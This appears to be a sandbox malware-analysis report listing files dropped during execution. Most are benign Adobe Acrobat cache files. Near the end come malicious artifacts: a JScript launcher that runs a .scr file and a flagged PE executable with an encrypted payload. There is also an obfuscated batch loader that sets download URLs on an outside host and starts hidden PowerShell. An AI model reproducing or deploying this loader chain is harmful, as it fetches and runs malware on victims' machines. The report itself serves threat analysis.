                                                                      Entropy (8bit):5.307945230718025
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfzdPeUkwRe9:YvXKXod2Zc0vkiGb8Ukee9
                                                                      MD5:78518B97EBD2690DA7A7BF34634663AE
                                                                      SHA1:218761D907F36DB20360A9C73C1B3E6A40E121B8
                                                                      SHA-256:DB0C5F43E376DA2608E25468FFF6CBE4463B4E994F89003B62D3FEC728EEC562
                                                                      SHA-512:68445543500EE4A5D95E02C56FE7598D64C3BEE7D50BBDA22062BB708D8C68EF8419956CA992B1A91D4975BEFBE27EC9FBA8A859955D3DF8E5097A620AA95640
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.288629391012672
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfYdPeUkwRe9:YvXKXod2Zc0vkiGg8Ukee9
                                                                      MD5:9C436FDE2080840610CB9A9024850332
                                                                      SHA1:43B2C6239DD4ABE50219BC7181E8939F3131CA03
                                                                      SHA-256:334F9C294EC03D9376BE40A90DEBF7414AD6C3FE17E9E3C4BC468472A89467A8
                                                                      SHA-512:287CF51B83C318759B8B4833488B03FBD9234D0A767C58C3F548409AA7BF5A64C09F055C144CC3097A19B193FAA33D774308D61B91E867E869A283E9C6C5A6ED
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):284
                                                                      Entropy (8bit):5.2744795770575985
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJf+dPeUkwRe9:YvXKXod2Zc0vkiG28Ukee9
                                                                      MD5:8EFA1722E5E125336E4D95F739159579
                                                                      SHA1:0108AEFE811FAB3AD58434A680E4F0657F603237
                                                                      SHA-256:F00EDCB6267BF48A8FC62181D9F82ADA6F693C2C1F901067AC867F24393B3D77
                                                                      SHA-512:2D6BFF5B3A059D996710CC0CFD23D25D231F5FF7727A4F108C89EE962B5607697D4EEF60C88D66EFA994F4F145028D8DDE5A7B623A51A75CDD66926DF39187ED
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):291
                                                                      Entropy (8bit):5.272254637201912
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfbPtdPeUkwRe9:YvXKXod2Zc0vkiGDV8Ukee9
                                                                      MD5:FC45FC5F414E4C208B3E4649B95928C3
                                                                      SHA1:9EE224A48B2E658013B668716F026E1DE4717B09
                                                                      SHA-256:9B662F1D68103007F20CC0C0905CAE1A45CAE0FECC0079CCBBCD51043F1E59F7
                                                                      SHA-512:AF7FC0F365D552A9AA4DEA58F72A1DBE3764B27D9C975ACC8A3CA0905E213BE4644A2F139FC9B776D14B9F5F97EE313735EBF24D69998AFC3B82D49AE2A81C41
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):287
                                                                      Entropy (8bit):5.277044569216403
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJf21rPeUkwRe9:YvXKXod2Zc0vkiG+16Ukee9
                                                                      MD5:F5CBAD9B22D383459D6537709C8FE1CC
                                                                      SHA1:D67ABB517252597030F013184A898FE8EF6732B1
                                                                      SHA-256:A751D4B1266F9A64AE86D5C2321D402C26E615374D6CA4A485EBBF07DDE6D4FD
                                                                      SHA-512:D07EA09529E0FD6E8937CEDA2DE821115E317D00D8ACD09E547C52EBE17F0E3B0084319A6C6BFEAFB4E6A06BA9B19C9516C8EE6FE3DD199B1326042283D6653C
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1090
                                                                      Entropy (8bit):5.668695052004936
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6Xg2zviamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSK:YvLuEBgkDMUJUAh8cvMK
                                                                      MD5:4950AB39D8D87CE3ADA5616E21016714
                                                                      SHA1:9800515410B116BB61FDE30555538790089E7E05
                                                                      SHA-256:F1DA010E268267C2430600CDFAE44DBCB1A6E461F45AE38A7E1CF33EAA2E66F7
                                                                      SHA-512:36EA5C8624A1C4DB6C8541FAC411D0FF2603FD0AE857E18B28380D85872A1D13B58CA98ABA91AAD0550D6D62F843A8FA24BC81D9505B4FE20A8AB07432999C14
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):286
                                                                      Entropy (8bit):5.253068828579654
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfshHHrPeUkwRe9:YvXKXod2Zc0vkiGUUUkee9
                                                                      MD5:C753277DA1F3DD68B7B2AD51F6429ED3
                                                                      SHA1:10C1FD0FF09238A25E9E536C13F658AB12ECD4BC
                                                                      SHA-256:FEA3EF0F551E6FEA6C9E91E4D0B185CED983DE9DDF82F64556C243792FBFB2B5
                                                                      SHA-512:BDA20B1D1DCEA712A5526878AB50211E69A8AFD6E84630D1EB91B41512A0E02D0C87913DCB70B5E3C1427D7E15FC0DDE3C20DA6723C69928A588AF993C34072F
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):282
                                                                      Entropy (8bit):5.269025646757322
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJTqgFCrPeUkwRe9:YvXKXod2Zc0vkiGTq16Ukee9
                                                                      MD5:0E34699479C2E4799345E10EC8CDC3C2
                                                                      SHA1:A4ED64C7CAA04BB026CE45A51A46F5DC67EF38CE
                                                                      SHA-256:82F3C56FAF12E3549112F99C368882764B67F97638ED2894F3893939E3FEAA95
                                                                      SHA-512:C31C0C299D12B20C15FE9C034E46F6DB4C1A4D5C4FCA69C6B4A08D21E3CAF1D4512A5FA3C327C0D156F67D0BA59804F7F26973AA9D61F3F99BD1A104690AFA29
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):0.8112781244591328
                                                                      Encrypted:false
                                                                      SSDEEP:3:e:e
                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                      Malicious:false
                                                                      Preview:....

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):2814
                                                                      Entropy (8bit):5.133181023293482
                                                                      Encrypted:false
                                                                      SSDEEP:24:YrM31LaKAWXBay9tpJvAt8NSlRAtPdZpo+jm8j0SS/geva2Tz7B2LSMChelH0qoa:Yr8vXpJAiNf1LNXBYzd6uelHJWUh9Rl
                                                                      MD5:8C0F758AECF7DF47BB7B34C170AD8D50
                                                                      SHA1:8537D119B9D377450228BFA6472386DC94A203A1
                                                                      SHA-256:D9024309E0F6C9E7E849AA79BFCA0A783368546B50E4F32CB9E48340FA32B152
                                                                      SHA-512:CFCC124D4A36418BE1A89AF4C419A53F67908990365248EF5E10DEF9DEAB0577502249B8CC8B0483C27B4BE2C22272F3815C33D96A1C5FE3CF4A771C0E2529AF
                                                                      Malicious:false
                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3da58886edfc52d7fcee8ee9b503eb9e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734309197000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"384f02ef468bd9df67ebf6aa84bf0e56","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734309197000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"0cb5dd4bd1067fb5acd89470a9592485","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734309196000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"7cd84c9b91d46c45a953713c528fc48a","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734309196000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"dd22d95d2c932d325f168f22f79b1118","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734309196000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"6e1d7daaaf9ebf442ac26e59ee1a836b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):1.1872790342842436
                                                                      Encrypted:false
                                                                      SSDEEP:48:TGufl2GL7msEHUUUUUUUUiSvR9H9vxFGiDIAEkGVvpQ:lNVmswUUUUUUUUi+FGSItE
                                                                      MD5:FEA369017EF67820030935BC22AF9A60
                                                                      SHA1:FD66D2587C04249EB23FD063631D2C9B77266AF7
                                                                      SHA-256:912A79ABFF6C652BFE4133A2E97E0A78610ACD991053D69C1BB00EEE5E925D82
                                                                      SHA-512:E24B682E2855D718936138E468B621012976718FC8FED6EF03F7C8F1F9107402C2B641DBFCEFD6C3D8FC03FF79991C2AC574D595979732F38BB071F6FDF7EA9A
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):1.6074982597658818
                                                                      Encrypted:false
                                                                      SSDEEP:48:7MxKUUUUUUUUUUwvR9H9vxFGiDIAEkGVv5vqFl2GL7msz:7bUUUUUUUUUUIFGSItzvKVmsz
                                                                      MD5:492702B8F13022795C689697F72ECFE4
                                                                      SHA1:EAE23CC165709547BDE190E46B7CB6E6801020C9
                                                                      SHA-256:6D8801732C3ECAD779537692422C2B8DED34B740BAF460E7BB99B3EC4DD38EB2
                                                                      SHA-512:F226ACA5BDD31F0921AAE5F341DBB06E51653B3684E45F37DD3EC381BA0AF49DA8DB9EE6887A29AF632E0A2AE950FC1E3EA6C34489BC0770768182143E5EB5B4
                                                                      Malicious:false
                                                                      Preview:.... .c.......D.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):66726
                                                                      Entropy (8bit):5.392739213842091
                                                                      Encrypted:false
                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEg8pSK27EjUi6luH4RhZXqiHYyu:6a6TZ44ADE0SK27EjUJdHK
                                                                      MD5:A5AAD5D569ABF6BAC7DC4ADCE44301AD
                                                                      SHA1:D758696C43B21C7CD62D0687C0925B169A98E66D
                                                                      SHA-256:5DA6D694ABB4BA6A94A321BE34A59538D2F15B42CFCE7F3D7F4C6DC8FBBCCCE4
                                                                      SHA-512:FCADAEF719FD37C93BCF2769D1EE08B57418514C59C6ED6639BD8125DDE0C16081C13C5E7854F63C9B95B5170E9B8DD6592DE7E2A7405B0A06BFEB250F7EC288
                                                                      Malicious:false
                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                      C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):184
                                                                      Entropy (8bit):4.734832042306239
                                                                      Encrypted:false
                                                                      SSDEEP:3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5mJKEufLOksaYuWGplZo5uWAX+Ro6p4EkD5ml:RiJBJHonwWDKaJkDjEYRswWGrywWDKaj
                                                                      MD5:C9EE39C71A07F0DFE15F88BC91618CE8
                                                                      SHA1:A55D4A3C53F75DEBA9EE14A89047931D59CF328F
                                                                      SHA-256:463231CD31CB7A685624EFD5A04ADC02BC1AFD6459488A5239AB5D4AEA071699
                                                                      SHA-512:EB6A76555ECB07A52815ACEB38FB21533FAA117F6A50F776CC9A9FDB011EBCD1ECDCADD12380333D4FB7CAB3F7865E0D4680F4DC41BB9EDD1D5C6069490986E1
                                                                      Malicious:true
                                                                      Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.scr\" \"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R\"")

                                                                      C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.62028134425878
                                                                      Encrypted:false
                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Joe Sandbox View:
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                      • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                      • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\CloudSynergy Solutions\R

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):257339
                                                                      Entropy (8bit):7.999363363076799
                                                                      Encrypted:true
                                                                      SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                      MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                      SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                      SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                      SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                      Malicious:false
                                                                      Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c[1].bat

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                      File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):3432
                                                                      Entropy (8bit):5.234062070088092
                                                                      Encrypted:false
                                                                      SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                      MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                      SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                      SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                      SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                      Malicious:true
                                                                      Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):21979
                                                                      Entropy (8bit):5.049158677118914
                                                                      Encrypted:false
                                                                      SSDEEP:384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
                                                                      MD5:E85ADBB7806D6C2B446681F25E86C54E
                                                                      SHA1:7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
                                                                      SHA-256:1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
                                                                      SHA-512:D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
                                                                      Malicious:false
